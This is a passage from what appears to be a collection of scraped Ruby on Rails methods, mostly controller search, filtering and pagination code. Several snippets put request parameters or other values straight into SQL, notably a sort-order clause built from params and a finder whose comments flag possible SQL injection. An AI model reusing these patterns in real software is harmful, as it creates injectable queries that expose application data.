[\"reject\",\"daitss v.1 reject\"] \n when 'archived'\n \"ingest finished\"\n when 'disseminated'\n \"disseminate finished\"\n when 'error'\n [\"ingest snafu\", \"disseminate snafu\", \"refresh snafus\"]\n when 'withdrawn'\n \"withdraw finished\"\n else\n ['submit', \"reject\", \"ingest finished\", \"disseminate finished\", \"ingest snafu\", \"disseminate snafu\", \"withdraw finished\", \"daitss v.1 provenance\"]\n end\n \n # filter on date range\n start_date = if params[:start_time_search] and !params[:start_time_search].strip.empty?\n DateTime.strptime(params[:start_time_search], \"%Y-%m-%d\")\n else\n Time.at 0\n end\n \n end_date = if params[:end_time_search] and !params[:end_time_search].strip.empty?\n DateTime.strptime(params[:end_time_search], \"%Y-%m-%d\")\n else\n DateTime.now\n end\n \n end_date += 1\n range = (start_date..end_date)\n \n # lookup account if passed in\n if (params[:account] && params[:account][\"account_id\"])\n account = Account.get(params[:account][\"account_id\"])\n end\n \n # lookup project if passed in\n if params[:project] && params[:project] [\"project_id\"]\n # account and project specified\n project = account.projects.first(:id => params[:project][\"project_id\"]) if account\n end\n \n if account \n if (project)\n # account and project specified\n ps = project.packages.events.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ]).packages \n else\n # account but not project specified\n ps = account.projects.packages.events.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ] ).packages \n end\n else \n # neither account nor project specified\n ps = Event.all(:timestamp => range, :name => names, :order => [ :timestamp.desc ]).packages \n end\n \n # filter on batches\n batch = Batch.get(params[:batch_search])\n if batch \n ps = ps.find_all { |p| p.batches.include? batch } \n end\n @packages = ps.paginate(page: params[:page])\n end\n end",
"def index\n #@samplings = Sampling.all\n @title = \"List of samplings\"\n\n #samplings = Sampling.find(:all, :joins=> [:sampling_equipments, :partner, :sampling_site]) do\n #samplings = Sampling.find(:all, :joins=> [:partner, :sampling_site]) do\n # if params[:_search] == \"true\"\n # volume =~ \"%#{params[:volume]}%\" if params[:volume].present?\n # code =~ \"%#{params[:code]}%\" if params[:code].present?\n # sampling_site.name =~ \"%#{params[:site_name]}%\" if params[:site_name].present?\n # sampling_site.code =~ \"%#{params[:site_name]}%\" if params[:site_name].present?\n # partner.code =~ \"%#{params[:partner_name]}%\" if params[:partner_name].present?\n # #KAPPAO because it done an AND operator between ID and CODE\n # #partner.id =~ \"%#{params[:partner_name]}%\" if params[:partner_name].present?\n # sampling_equipment.name =~ \"%#{params[:sampling_equipment_name]}%\" if params[:sampling_equipment_name].present?\n # end\n #paginate :page => params[:page], :per_page => params[:rows] \n # if params[:sidx] == \"site_name\"\n # order_by \"sampling_sites.name #{params[:sord]}, sampling_sites.code #{params[:sord]}\"\n #\n # elsif params[:sidx] == \"partner_name\"\n # order_by \"partners.code #{params[:sord]}\"\n # elsif params[:sidx] == \"code\"\n # order_by \"samplings.code #{params[:sord]}\"\n # elsif params[:sidx] == \"sampling_equipment_name\"\n # order_by \"sampling_equipments.name #{params[:sord]}\"\n # else\n # order_by \"#{params[:sidx]} #{params[:sord]}\"\n # end\n #end\n\n #respond_to do |format|\n # format.html # index.html.erbs directly,\n # #format.xml { render :xml => @samplings }\n # format.json { render :json => samplings.to_jqgrid_json(\n # [:id, \"act\",:code,:site_name,:volume,\"partner_name\", \"sampling_equipment_name\",\"edit\"],\n # params[:page], params[:rows], samplings.total_entries) }\t\t\t\n #end\n\n\n index_columns ||= [:id, :act,:code,:site_name,:volume, :partner_name,:sampling_equipment_name,:edit]\n current_page = params[:page] ? params[:page].to_i : 1\n rows_per_page = params[:rows] ? params[:rows].to_i : 10\n conditions={:page => current_page, :per_page => rows_per_page}\n conditions[:order] = params[\"sidx\"] + \" \" + params[\"sord\"] unless (params[:sidx].blank? || params[:sord].blank?)\n \n if params[:_search] == \"true\"\n conditions[:conditions]=filter_by_conditions(index_columns)\n end\n \n #@fs = FilterSample.all(:conditions => ['sampling_id = ?', @sampling.id ])\n @samplings=Sampling.paginate(conditions)\n total_entries=@samplings.total_entries\n \n respond_with(@samplings) do |format|\n format.json { render :json => @samplings.to_jqgrid_json(index_columns, current_page, rows_per_page, total_entries)} \n end\n end",
"def exercise3\n @content = ActiveRecord::Base.connection.execute(\"\n SELECT\n gr.name as group,\n u.name as name,\n SUM(m.mapviews) as views,\n CONCAT(CAST(ROUND((SUM(m.mapviews)*100)/SUM(SUM(m.mapviews)) OVER (PARTITION BY gr.name),2) as text), '%') as percent_of_group_views\n FROM (((users as u\n INNER JOIN groups_users as gu ON u.id=gu.user_id)\n INNER JOIN groups as gr ON gr.id = gu.group_id)\n INNER JOIN maps as m ON m.user_id = u.id)\n GROUP BY (gr.name, u.name)\n ORDER BY gr.name ASC, percent_of_group_views DESC;\");\n\n @results3 = []\n\n index = 0\n @content.each do |r|\n @results3[index] = Result3.new r\n index = index + 1;\n end\n\n return @results3\n end",
"def index\n @q = Author.search(params[:q])\n @authors = @q.result(distinct: true).paginate(:page => params[:page]).order('last_name ASC')\n end",
"def reify_results(ids)\n results = []\n \n ids_hash = {}\n ids.each do |class_name, id|\n (ids_hash[class_name] ||= []) << id\n end\n \n ids.map {|ary| ary.first}.uniq.each do |class_name|\n klass = class_name.constantize\n \n finder = (\n Ultrasphinx::Search.client_options['finder_methods'].detect do |method_name| \n klass.respond_to? method_name\n end or\n # XXX This default is kind of buried, but I'm not sure why you would need it to be \n # configurable, since you can use ['finder_methods'].\n \"find_all_by_#{klass.primary_key}\"\n )\n\n records = klass.send(finder, ids_hash[class_name])\n \n unless Ultrasphinx::Search.client_options['ignore_missing_records']\n if records.size != ids_hash[class_name].size\n missed_ids = ids_hash[class_name] - records.map(&:id)\n msg = if missed_ids.size == 1\n \"Couldn't find #{class_name} with ID=#{missed_ids.first}\"\n else\n \"Couldn't find #{class_name.pluralize} with IDs: #{missed_ids.join(',')} (found #{records.size} results, but was looking for #{ids_hash[class_name].size})\"\n end\n raise ActiveRecord::RecordNotFound, msg\n end\n end\n \n records.each do |record|\n results[ids.index([class_name, record.id])] = record\n end\n end\n \n # Add an accessor for global search rank for each record, if requested\n if self.class.client_options['with_global_rank']\n # XXX Nobody uses this\n results.each_with_index do |result, index|\n if result\n global_index = per_page * (current_page - 1) + index\n result.instance_variable_get('@attributes')['result_index'] = global_index\n end\n end\n end\n\n # Add an accessor for distance, if requested\n if self.options['location']['lat'] and self.options['location']['long']\n results.each_with_index do |result, index|\n if result\n distance = (response[:matches][index][:attributes]['@geodist'] or INFINITY)\n result.instance_variable_get('@attributes')['distance'] = distance\n end\n end\n end\n \n results.compact!\n \n if ids.size - results.size > Ultrasphinx::Search.client_options['max_missing_records']\n # Never reached if Ultrasphinx::Search.client_options['ignore_missing_records'] is false due to raise\n raise ConfigurationError, \"Too many results for this query returned ActiveRecord::RecordNotFound. The index is probably out of date\" \n end\n \n results \n end",
"def index\n \n\n @q = current_user.organization.my_threads.search(params[:q])\n if params[:sel]\n \t@my_threads = @q.result(:distinct => true).includes(:thread_comments).order('thread_comments.updated_at DESC').page(params[:page]).per(params[:sel]) \n \t@chosen = params[:sel] \n else\n \t@my_threads = @q.result(:distinct => true).includes(:thread_comments).order('thread_comments.updated_at DESC').page(params[:page]).per(50) \n\t@chosen = 50\n end \n\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @my_threads }\n end\n end",
"def search_results(all_pages)\n formatted_list = []\n all_pages.each do |show_hash|\n formatted_list << \"id. #{show_hash[\"id\"]} - #{show_hash[\"name\"]}\"\n end\n if formatted_list.count != 1\n self.print_search_results(formatted_list)\n else\n fetch_show_by_id(all_pages[0][\"id\"].to_s)\n end\nend",
"def index\n @submissions = Field.find_by_sql(\"SELECT DISTINCT ON (unique_id) unique_id, form_id , updated_at FROM Fields WHERE user_id= #{current_user.id}\")\n end",
"def index\n my_tenant_id = (current_user.role == 'admin' ? current_user.tenant_id : nil)\n @all_stats = Stats.new\n @seven_day_stats = Stats.new(tenant_id: my_tenant_id, since: (Time.new - 7.days))\n @resources = build_table_query\n # If no records were found and a search parameter was specified, requery with\n # a ful text search to find partial word matches\n @resources = build_table_query(true) if @resources.empty? && params[:q].present? && params[:q].length > 4\n @publications = InternalDatum.where(data_type: 'publicationName').order(:value).pluck(:value).uniq\n respond_to do |format|\n format.html\n format.csv\n end\n end",
"def indexPhotographers\n @q = Vendor.where(entry:'Photographer').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index \n @q = Car.ransack(params[:q])\n if @q.result.blank?\n redirect_to :back, alert: \"Sorry, No Results Found!\"\n else\n @cars = @q.result(distinct: true).where(:published => true).paginate(:page => params[:page], :per_page => 8).order('created_at DESC')\n end\n end",
"def index\n# @events = Event.all\n\n @q = Event.ransack(params[:q])\n @events = @q.result(distinct: true).page(params[:page]).per(3)\n\n \n end",
"def search_query\n query = @grouping_class.new(sanitized_attributes, params)\n data = query.run\n @search_data = Rails.cache.fetch(['search_data', params], expires_in: 1.week) do\n query.build_hash(data, params)\n end\n @filtered_data = query.filter(@search_data, params)\n render :json => Kaminari.paginate_array(@filtered_data).page(params[:page]).per(params[:per_page]),\n :meta => metadata(@filtered_data, params)\n end",
"def index\n @products = Product.all.page(params[:page]).per(12)\n # .result(distinct: true)\n\n if params[:q].present?\n # 検索フォームからアクセスした時の処理\n @serch = Product.ransack(params[:q])\n @products = @serch.result(distinct: true).page(params[:page]).per(12)\n else\n # 検索フォーム以外からアクセスした時の処理\n params[:q] = { sorts: 'id desc' }\n @serch = Product.ransack(params[:sorts])\n @products = Product.all.page(params[:page]).per(12)\n end\n end",
"def handle_pagination(query, ts_params, result)\n # Tablesorter submits row count or simply 'all'. If user requests more rows\n # than available do nothing.\n return query if (ts_params[:size] == 'all') || (ts_params[:size].to_i >= result[:total_rows])\n\n query.limit(ts_params[:size].to_i).offset(ts_params[:size].to_i * ts_params[:page].to_i)\n end",
"def index\n @search = search_params\n @results = InstructorInfo.order(\"RANDOM()\").limit(12)\n @tutor_reviews = Review.last(12).reverse\n unless @search[:min_rating].empty?\n @results = @results.where(\"avg_rating >= ?\", @search[:min_rating])\n end\n unless @search[:join_at].empty?\n if @search[:join_at] == \"半年内\"\n @results = @results.where(created_at: 6.month.ago..Date.today())\n elsif @search[:join_at] == \"半年到一年\"\n @results = @results.where(created_at: 1.year.ago..6.month.ago)\n elsif @search[:join_at] == \"一年以上\"\n @results = @results.where('created_at < ?', 1.year.ago)\n end\n end\n unless @search[:price_range] == '0,1000'\n min, max = @search[:price_range].split(',')\n @results = @results.where(price_base: min..max)\n end\n unless @search[:service].empty?\n or_results = nil\n for service in @search[:service]\n if service == \"早期咨询\"\n tmp = @results.where(is_early_consult: true)\n elsif service == \"头脑风暴\"\n tmp = @results.where(is_brainstorm_consult: true)\n elsif service == \"文书改写\"\n tmp = @results.where(is_essay_consult: true)\n elsif service == \"签证咨询\"\n tmp = @results.where(is_visa_consult: true)\n end\n or_results = or_results.nil? ? tmp : or_results.or(tmp)\n end\n @results = or_results\n end\n unless @search[:available_time].empty?\n end\n end",
"def updateGoogleSearchResults\n\n puts \"Updating Google Search Results\"\n\n SITE_CONFIG.each do |site, opts|\n\n Product.where(site_name: site).distinct(:sku).each do |sku|\n\n puts \"Grabbing Results for #{site.humanize.capitalize}:#{sku}\"\n\n getGoogleSearchResults(sku, site)\n\n end\n\n end\n\nend",
"def index\n #@maker_masters = MakerMaster.all\n\t\n\t@q = MakerMaster.ransack(params[:q]) \n @maker_masters = @q.result(distinct: true)\n @maker_masters = @maker_masters.page(params[:page])\n\n end",
"def index\n @filters = Filter.all\n @cars = Car.standard.has_photos.owner_has_login.includes(:user, :photos, :trim, model: :make)\n filter = Filter.find_by(id: params[:filter])\n if params[:search].present? || (params[:lat].present? && params[:lng].present?)\n @cars = @cars.simple_search(params[:search], params[:lat], params[:lng], params[:radius])\n @user_count = User.simple_search(params[:search], params[:lat], params[:lng], params[:radius]).count\n elsif filter\n @cars = filter.search\n end\n\n per_page = 12\n\n # Show random results on first page, order by date for page 2+\n if params[:page].to_s.to_i > 1 || params[:search].present? || (params[:lat].present? && params[:lng].present?)\n @cars = @cars.order(created_at: :desc)\n start_at = params[:page].to_i\n start_at = 1 if start_at.zero?\n @for_pagination = @cars.page(start_at).per(per_page)\n # Start at page 1 when user is at page 2 (since page 1 is really a random set)\n start_at -= 1 if params[:search].blank?\n @cars = @cars.page(start_at).per(per_page)\n else\n @for_pagination = @cars.page(params[:page]).per(per_page)\n @cars = @cars.where(id: @cars.pluck(:id).sample(per_page))\n end\n end",
"def index\n @q = Listing.all.where('id NOT IN (SELECT DISTINCT(listing_id) FROM purchases)').ransack(params[:q])\n @listings = @q.result(distinct: true).page(params[:page]).per(30)\n end",
"def index\n # @things = Thing.all\n # indexarr = params[:indices]\n # # indexarr = [60, 59, 62, 61, 70, 94, 72, 71, 85, 32, 16, 6, 27, 38, 14, 90, 48, 39, 74, 66]\n # # mi = indexarr.map.with_index(0).to_a\n \n # res = Thing.joins(:model_version_images).where('model_version_images.index' => indexarr).group(\"things.id\")\n\n # mindex = indexarr.each_with_index.map {|m, i| \"(#{m},#{i})\" }.join(\",\")\n # # r = Thing.select(\"things.*, MIN(x.ordering) as imgorder\").joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\").order(\"imgorder\").includes(:model_version_images).page(1).per(2)\n # r = Thing.select(\"things.*, MIN(x.ordering) as imgorder\").joins(\"model_version_images as images ON things.id = images.thing_id\").joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\").order(\"imgorder\").includes(:model_version_images)\n # res = Thing.joins(:model_version_images).joins(\"INNER JOIN ( values #{mindex}) as x (index, ordering) ON model_version_images.index = x.index\").group(\"things.id\")\n end",
"def index\n @search = Backend::Category.order(created_at: :desc).search(params[:q])\n @backend_categories = @search.result(:distinct => true)\n @backend_categories = @backend_categories.page(params[:page])\n # @search = Supervisor.search(params[:q])\n # @supervisors = @search.result(:distinct => true)\n end",
"def index\n @q = Recepcion.search(params[:q])\n @recepcions = @q.result(:distinct => true)\n end",
"def index\n @photographs = Photograph.all\n\n @search = Photograph.ransack(params[:q])\n @photographs = @search.result(distinct: true)\n end",
"def list_researchers\n catid = params[:catid] || ''\n\n lyear = params[:lyear] || '1900'\n hyear = params[:hyear] || '9999'\n spost = params[:spost] || '0'\n npost = params[:npost] || '-1'\n if catid.blank?\n render nothing: true\n return\n end\n category_obj = Category.find_by_id(catid.to_i)\n if category_obj.blank?\n render nothing: true\n return\n end\n\n svepid = category_obj.svepid\n\n sql_str = \"SELECT p.id, p.last_name, p.first_name, p.year_of_birth, i.value, count(p.id) c, row_number() OVER () AS rnum\n FROM people p\n JOIN identifiers i ON i.person_id = p.id\n JOIN sources s ON s.id = i.source_id\n JOIN people2publications p2p ON p2p.person_id = p.id\n JOIN publication_versions pv ON pv.id = p2p.publication_version_id\n JOIN publications publ ON publ.current_version_id = pv.id\n JOIN categories2publications c2p ON c2p.publication_version_id = pv.id\n JOIN categories c ON c.id = c2p.category_id\n WHERE s.name = 'xkonto'\n AND publ.deleted_at IS NULL\n AND publ.published_at IS NOT NULL\n AND CAST(c.svepid AS text) LIKE ?\n AND pv.pubyear >= ?\n AND pv.pubyear <= ?\n GROUP BY p.id, p.last_name, p.first_name, p.year_of_birth, i.value\n HAVING count(p.id) > 1\n ORDER BY p.last_name, p.first_name\"\n\n person_list = Person.find_by_sql([sql_str, \"#{svepid}%\", lyear, hyear])\n if person_list.blank?\n render nothing: true\n return\n end\n person_list_sliced = (npost.to_i == -1) ? person_list[spost.to_i..-1] : person_list[spost.to_i, npost.to_i]\n if person_list_sliced.blank?\n render nothing: true\n return\n end\n\n total = person_list.length\n items = person_list_sliced.length\n\n builder = Nokogiri::XML::Builder.new do |xml|\n xml.send(:\"upl-records-researchers\") do\n xml.send(:\"header\") do\n xml.items items\n xml.total total\n end\n xml.send(:\"upl-researchers\") do\n person_list_sliced.each.with_index do |p, i|\n xml.send(:\"upl-researchers\", \"num\" => \"#{i + 1}\") do\n xml.rnum p.rnum\n xml.last p.last_name\n xml.first p.first_name\n xml.byear p.year_of_birth\n xml.external_user_id p.value\n xml.pubcount p.c\n end\n end\n end\n end\n end\n render xml: builder\n\n end",
"def fetch\n sort = 'created_at DESC'\n\n case params[:sort_by]\n when 'recent'\n sort = 'created_at DESC'\n else\n\n end\n\n q = '%' + params[:query].downcase + '%'\n\n groups = Group.where(\"LOWER(name) LIKE ? OR LOWER(identifier) LIKE ? OR lower(tags) LIKE ?\", q, q, q)\n .order(sort)\n\n paginate json: groups\n end",
"def execute\n perform_search(Group.all)\n .then(&method(:paginate))\n .then(&method(:sort))\n end",
"def indexHairdressers\n\n \n @q = Vendor.where(entry:'Hairdresser').ransack(params[:q])\n\n @per_page = params[:per_page] || Vendor.per_page || 20\n @vendors = @q.result(:distinct=>true).paginate( :per_page => @per_page, :page => params[:page])\n \n\n\n if @vendors.size.zero?\n flash[:notice] = \"No Matches Found\"\n end\n end",
"def index\n @publishers = Publisher.joins(:resource,:resource => :site).select(\n \"publishers.id as publisher_id, \n publishers.hostname as publisher_hostname,\n sites.name as site_name,resources.name as resource_name, \n publishers.ip as publisher_ip, publishers.token as publisher_token\").paginate( :page=>params[:page], :per_page => config.itemsPerPageHTML).orderByParms('publisher_hostname',params).search(params[:key],params[:search])\n respond_to do |format|\n format.html {}\n format.any(:xml,:json) {}\n end\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @publishers }\n format.xml { render :xml => @publishers }\n end\n end",
"def paginator=(_arg0); end",
"def index\n sort_field = params[\"sort_field\"] || :social_connection_index\n sort_order = params[\"sort_order\"] || :desc\n page = params[\"page\"] || 1\n limit = params[\"limit\"] || 10\n searchTerm = params[\"searchTerm\"] || \"\"\n\n limit = limit.to_i\n offset = (page.to_i - 1) * limit\n\n users = User.all.order(sort_field => sort_order, :id => \"desc\").\n where(User.arel_table[:name].matches(\"%#{searchTerm}%\"))\n\n total = users.count\n users = users.offset(offset).limit(limit)\n users = users.select(User.column_names - [\"created_at\", \"updated_at\"])\n\n response = {\n users: users,\n page: page,\n total: total,\n limit: limit\n }\n\n respond_to do |format|\n format.json { render :json => response }\n end\n end",
"def index\n @retail_buyer_profile = @profile if (params[:from] && params[:from] == \"buyer_leads\" )\n @page_number = (params[:page_number] || \"1\").to_i\n @result_filter = (params[:result_filter] || \"all\")\n default_sort_type = @profile.owner? ? \"has_profile_image,desc\" : \"privacy,desc\"\n @sort = (params[:sort] || default_sort_type)\n @sort_type = @sort.split(',')[0]\n @sort_order = @sort.split(',')[1]\n @sort_string = \"#{@sort_type} #{@sort_order}\"\n @offset = @page_number == 1 ? nil : (@page_number-1) * PROFILES_PER_PAGE\n @listing_type = params[:listing_type] || \"all\"\n @listing_type = \"all\" if @listing_type.empty?\n\n # Fetch results, with custom pagination support\n @profiles,@total_profiles_fetched,@total_pages = MatchingEngine.get_matches(:profile=>@profile, :offset=>@offset, :result_filter=>@result_filter, :number_to_fetch=> PROFILES_PER_PAGE, :sort=>@sort_string, :listing_type=>@listing_type, :use_cache => true)\n\n unless (@profile.is_wholesale_profile? or @profile.is_wholesale_owner_finance_profile?)\n offset,number_to_fetch = Profile.get_limit_and_offset(@total_profiles_fetched,@page_number,PROFILES_PER_PAGE)\n #Near Match\n if @result_filter=='all' || @result_filter=='new'\n @near_profiles,@near_total_profiles,@near_total_pages = MatchingEngine.get_matches(:profile=>@profile, :offset=>offset, :result_filter=>@result_filter, :number_to_fetch=> number_to_fetch, :sort=>@sort_string, :listing_type=>@listing_type, :use_cache => true, :near_match => true)\n else\n @near_profiles,@near_total_profiles,@near_total_pages = NearMatchingEngine.get_near_matches(:profile=>@profile, :offset=>offset, :result_filter=>@result_filter, :number_to_fetch=> number_to_fetch, :sort=>@sort_string, :listing_type=>@listing_type)\n end\n else\n @near_profiles,@near_total_profiles,@near_total_pages = [], 0, 0\n end\n\n if @result_filter=='all' || @result_filter=='new' || @result_filter=='favorites'\n @total_pages = ( (@total_profiles_fetched.to_i + @near_total_profiles.to_i) / PROFILES_PER_PAGE.to_i)\n @total_pages += 1 if ((@total_profiles_fetched.to_i + @near_total_profiles.to_i) % PROFILES_PER_PAGE.to_i) != 0\n @total_pages = 1 if @total_pages == 0\n end\n # Prime the profile models for their display purpose\n @profiles.each { |profile| profile.prepare_for_match_display(@profile, profile_profile_view_path(@profile, profile))}\n\n # prepare the map\n @map = ZipCodeMap.prepare_map(@profiles.first.zip_code.to_s) unless @profiles.first == nil\n @map = ZipCodeMap.prepare_map(@profile.zip_code.to_s) if @profiles.first == nil\n\n @boundary_overlays = ZipCodeMap.prepare_boundary_overlays(@profile.zip_code.to_s)\n\n @marker_overlays = ZipCodeMap.prepare_marker_overlays(@profiles, :context_profile=>@profile, :return_params=>encode_return_dashboard_variables) unless @profiles.first == nil\n @marker_overlays = [] if @profiles.first == nil\n\n respond_to do |format|\n format.html do\n # if we need some special javascript to update the buyer map, change this call to render a different partial\n # with this call embeded within\n render :partial=>\"#{@profile.profile_type.permalink_to_generic_page}_matches\" and return if request.xhr?\n end\n format.xml { render :xml => @profiles.to_xml }\n format.json { render :json => @profiles.to_json(:only=>[:id], :methods =>[:display_name, :display_type, :display_description, :display_features, :display_price, :display_is_favorite, :display_details_uri]) }\n end\n end",
"def getResults (allEntryIds, page, resultsPerPage)\n pubLib = Array.new\n @startIndex = (page-1)*resultsPerPage\n @endIndex = @allEntries.size() <= ((page-1)*resultsPerPage)+resultsPerPage ? @allEntries.size() : ((page-1)*resultsPerPage)+resultsPerPage\n #puts \"#{@startIndex} to #{@endIndex}\"\n medline = esummary(allEntryIds.values_at(@startIndex ... @endIndex).join(','))\n d = Hpricot.XML(medline) \n pubmedRank = @startIndex+1\n (d/:DocSum).each do |a|\n entry = Hash.new\n entry[:pubmedRank] = pubmedRank\n entry[:id] = a.at('Id').inner_html\n entry[:Date] = a.at(\"Item[@Name='PubDate']\").inner_html\n autoren = Array.new\n a.at(\"Item[@Name='AuthorList']\").search('Item') do |author|\n if(!author.nil?)\n autoren.push \"#{author.inner_html}\"\n end\n end\n #autoren += a.at(\"Item[@Name='LastAuthor']\").inner_html creates duplicate of LastAuthor, bad!\n entry[:Authors] = autoren\n entry[:Title] = a.at(\"Item[@Name='Title']\").inner_html\n pmcid =\"none\" \n if(a.at(\"Item[@Name='ArticleIds']\").at(\"Item[@Name='pmc']\"))\n pmcid = a.at(\"Item[@Name='ArticleIds']\").at(\"Item[@Name='pmc']\").inner_html\n end\n entry[:PMCid] = pmcid\n pubLib << entry\n pubmedRank += 1\n end \n pubLib\n end",
"def index\n #if params[:search]\n # @links = current_user.links.limit(500).group(:short_url).paginate :page => params[:page], :per_page => 20, :order => 'post_date DESC'\n #else\n @links = current_user.links.search(params[:search]).paginate :page => params[:page], :per_page => 20\n #end\n \n=begin\n #delete duplicates almost there TODO\n dups = current_user.links.group(:short_url).count\n\n @links.each_with_index do |link, i|\n link.count = dups[link.short_url]\n if dups[link.short_url] > 1\n @links.delete_if do |v| \n v.short_url == link.short_url\n puts v.short_url\n puts \"=====hit=====\"\n end\n end\n end\n=end\n \n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @links }\n end\n end",
"def find(model)\n\n # Find out how many are in each bucket\n # FIXME: This may be databse specific. Works on MySQL and SQLite\n # FIXME: field should be sanatized. Possible SQL Injection attack\n @counts = model.count :all,\n :group => \"SUBSTR(LOWER(#{field.to_s}), 1, 1)\"\n @counts = @counts.inject(HashWithIndifferentAccess.new()) do |m,grp|\n grp[0] = grp[0].blank? ? 'Blank' : grp[0]\n m[grp[0]] = m[grp[0].upcase] = grp[1]\n m\n end\n @counts['All'] = total if @options[:all]\n\n # Reset to default group if group has not records\n self.group = nil unless @counts.has_key? group\n\n # Find the first group that has records\n all_groups = ('A'..'Z').to_a + ['Blank']\n all_groups << 'All' if @options[:all]\n self.group = all_groups.detect(proc {'A'}) do |ltr|\n @counts.has_key? ltr\n end if group.blank?\n\n unless (min_records && total >= min_records) || group == 'All'\n # Determine conditions. '' or NULL shows up under \"Blank\"\n operator = if group == 'Blank'\n # FIXME: Field should be sanatized. Possible SQL Inject attack\n \"= '' OR #{field.to_s} IS NULL\"\n else\n 'LIKE ?'\n end\n # FIXME: Field should be sanatized. Possible SQL Inject attack\n conditions = [\n \"#{model.table_name}.#{field.to_s} #{operator}\",\n \"#{group}%\"\n ]\n end\n\n # Find results for this page\n model.with_scope({:find => {:conditions => conditions}}) {model.find :all}\n end",
"def index\n # binding.pry\n @shares = Share.all\n @q = Share.search(params[:q])\n @shares = @q.result(distinct: true)\n end",
"def show\n @websitepages = @website.pages\n @pages = @websitepages.where(:show_page_on_index => true)\n @times = @website.timetables \n @search = Inventory.where(:website_id => @website.id).ransack(params[:q]) \n @listings = @search.result.paginate(:per_page => 12, :page => params[:page]) \n @search.build_condition \n\n # @newlisting = Listing.new(\"https://fierce-sea-43472.herokuapp.com/categories.json\") \n # @listings = @newlisting.getresponse((User.find_by_id(@website.user_id).email).to_s)\n # if params[:sort].present? && params[:direction].present?\n \n # else\n # @listings = @search.result.paginate(:per_page => 12, :page => params[:page]) \n # end\n\n end",
"def query_without_filter_paging_sorting\n query = @initial_query.dup\n\n # restrict to select columns\n query_projection(query)\n end",
"def index\n @public_teams = Team.where(private: nil)\n #@companies_with_public_teams = Team.where(private: nil).group(:company_id)\n @companies_with_public_teams = Team.where(private: nil).select(\"DISTINCT ON (company_id) *\")\n end",
"def index\n\n#client = Google::APIClient.new\n\n@products = Product.paginate(:page => params[:page], :per_page => 30)\n@manufacturers = Product.uniq.pluck(:manufacturer)\n@categories = Product.uniq.pluck(:type_b)\n@sub_categories = Product.uniq.pluck(:sub_type)\n\nend",
"def index\n where = {}\n @url_params = {}\n @sort_by = nil\n @sort_dir = nil\n order_clause = nil\n if session[:tablen].nil?\n\tsession[:tablen] = 20\n end\n\n if not params[:sort_by].nil?\n\n if params[:sort_by] == \"count\"\n @sort_by = \"count\"\n end\n\n if params[:sort_by] == \"port\"\n @sort_by = \"port\"\n end\n\n if params[:sort_by] == \"transport_protocol\"\n @sort_by = \"transport_protocol\"\n end\n\n if not @sort_by.nil?\n if params[:sort_dir] == \"desc\"\n @sort_dir = \"desc\"\n else\n @sort_dir = \"asc\"\n end\n\n order_clause = \"#{@sort_by} #{@sort_dir}\"\n end\n else\n order_clause = \"count desc\"\n end\n\n if not params[:trans_v].nil?\n where[:transport_protocol] = params[:trans_v]\n @url_params[:trans_v] = params[:trans_v]\n end\n\n if session[:test_area].nil?\n @record_count = PortSummary.find(:all, :conditions => where).length\n @pager = Paginator.new(@record_count, session[:tablen]) do |offset, per_page|\n # PortSummary.find(:all, :order => order_clause, :limit => per_page, :offset => offset, :conditions => where)\n PortSummary.find(:all, :select => [\"sum(count) as count, port, transport_protocol\"], :order => order_clause, :limit => per_page, :offset => offset, :conditions => where, :group => \"port, transport_protocol\")\n # TODO order by something\n end\n else\n @record_count = PortSummary.find_all_by_test_area_id(session[:test_area], :conditions => where).length\n @pager = Paginator.new(@record_count, session[:tablen]) do |offset, per_page|\n PortSummary.find_all_by_test_area_id(session[:test_area], :order => order_clause, :limit => per_page, :offset => offset, :conditions => where)\n # TODO order by something\n end\n end\n\n @port_summarys = @pager.page(params[:page])\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @port_summarys }\n end\n end",
"def results; end",
"def results; end",
"def results; end",
"def source_results(race)\n if race.discipline == 'Road'\n race_disciplines = \"'Road', 'Circuit'\"\n else\n race_disciplines = \"'#{race.discipline}'\"\n end\n \n # Cat 4/5 is a special case. Can't config in database because it's a circular relationship.\n category_ids = category_ids_for(race)\n category_4_5_men = Category.find_by_name(\"Category 4/5 Men\")\n category_4_men = Category.find_by_name(\"Category 4 Men\")\n if category_4_5_men && category_4_men && race.category == category_4_men\n category_ids << \", #{category_4_5_men.id}\"\n end\n\n Result.find(:all,\n :include => [:race, {:person => :team}, :team, {:race => [{:event => { :parent => :parent }}, :category]}],\n :conditions => [%Q{\n place between 1 AND #{point_schedule.size - 1}\n and (events.type in ('Event', 'SingleDayEvent', 'MultiDayEvent', 'Series', 'WeeklySeries', 'TaborOverall') or events.type is NULL)\n and bar = true\n and events.sanctioned_by = \"#{ASSOCIATION.default_sanctioned_by}\"\n and categories.id in (#{category_ids})\n and (events.discipline in (#{race_disciplines})\n or (events.discipline is null and parents_events.discipline in (#{race_disciplines}))\n or (events.discipline is null and parents_events.discipline is null and parents_events_2.discipline in (#{race_disciplines})))\n and (races.bar_points > 0\n or (races.bar_points is null and events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points > 0)\n or (races.bar_points is null and events.bar_points is null and parents_events.bar_points is null and parents_events_2.bar_points > 0))\n and events.date between '#{date.year}-01-01' and '#{date.year}-12-31'\n }],\n :order => 'person_id'\n )\n end",
